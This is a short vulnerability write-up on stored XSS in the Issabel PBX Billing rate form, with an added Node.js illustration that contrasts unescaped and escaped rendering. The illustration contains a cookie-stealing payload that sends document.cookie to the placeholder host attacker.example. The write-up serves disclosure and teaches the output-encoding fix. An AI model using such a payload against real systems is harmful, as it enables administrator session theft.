How to exploit stored XSS on Issabel PBX
Home Page: https://www.issabel.org/
Source Forge: https://sourceforge.net/projects/issabelpbx/
In Issabel's administrative interface there is a Reports panel. On the Billing panel, we can create new rates, and the form used to create a new rate is vulnerable to stored XSS: the submitted values are saved and later rendered back into the page without output encoding.
The name and prefix fields are both vulnerable; injecting an XSS payload into either of them succeeds, and the payload then fires for any administrator who views the stored rate.
Stored XSS successfully performed.
Session hijack example
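The following Node.js snippet is an added illustration of the bug class described above and of what a session-hijack payload stored in the rate name looks like. It is not Issabel's code: the row rendering is a stand-in for however the Billing panel prints the rate table, the `attacker.example` host is a placeholder, and the `storedRate` row is constructed here for the demonstration.

```javascript
// Added illustration (not Issabel's code): a rate "name"/"prefix" rendered into
// HTML without escaping becomes stored XSS; the escaped version does not.
// The attacker host below is a placeholder, the sample row is constructed.

// Typical session-hijack payload: the <img> fails to load, onerror runs, and
// the browser sends document.cookie to the attacker-controlled host.
const PAYLOAD =
  '<img src=x onerror="new Image().src=\'https://attacker.example/c?\'+document.cookie">';

// Vulnerable pattern: user-supplied fields concatenated straight into markup.
function renderRateRowVulnerable(rate) {
  return `<tr><td>${rate.name}</td><td>${rate.prefix}</td><td>${rate.rate}</td></tr>`;
}

// Fix: HTML-encode every untrusted value at the point it is written into the page.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderRateRowSafe(rate) {
  return `<tr><td>${escapeHtml(rate.name)}</td>` +
         `<td>${escapeHtml(rate.prefix)}</td>` +
         `<td>${escapeHtml(rate.rate)}</td></tr>`;
}

// Crude check used only to make the difference visible here: did a user-supplied
// element that can execute script survive into the rendered HTML?
function containsActiveMarkup(html) {
  return /<\s*(img|script|svg|iframe)\b/i.test(html);
}

// Constructed "stored rate" row with the payload in the name field.
const storedRate = { name: PAYLOAD, prefix: '001', rate: '0.05' };

console.log(containsActiveMarkup(renderRateRowVulnerable(storedRate))); // true
console.log(containsActiveMarkup(renderRateRowSafe(storedRate)));       // false
```

If the session cookie carried the HttpOnly flag, `document.cookie` would not expose it and this particular hijack would fail, but the injected script still runs with the administrator's session and can issue authenticated requests from the victim's browser, so HttpOnly narrows the impact without fixing the XSS; output encoding of the stored fields does.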